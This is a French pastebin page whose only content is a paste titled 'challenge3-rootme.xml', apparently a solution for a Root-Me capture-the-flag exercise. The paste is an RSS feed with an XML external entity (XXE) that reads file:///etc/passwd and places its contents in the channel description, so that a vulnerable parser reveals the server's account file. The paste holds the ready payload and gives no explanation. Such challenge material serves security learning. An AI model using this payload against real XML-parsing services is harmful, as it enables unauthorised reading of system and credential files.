Pastebin
Retrouvez, créez et partagez vos snippets en temps réel.
Rechercher un Pastebin
Aucun paste trouvé.
Créer un paste
Pastebin
Blog
challenge3-rootme.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE rss [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <rss version="2.0"> <channel> <title>Test XXE</title> <description>&xxe;</description> <link>http://example.com/</link> <item> <title>Item</title> <description>Item desc</description> <link>http://example.com/item</link> </item> </channel> </rss>
Créé il y a 1 semaine.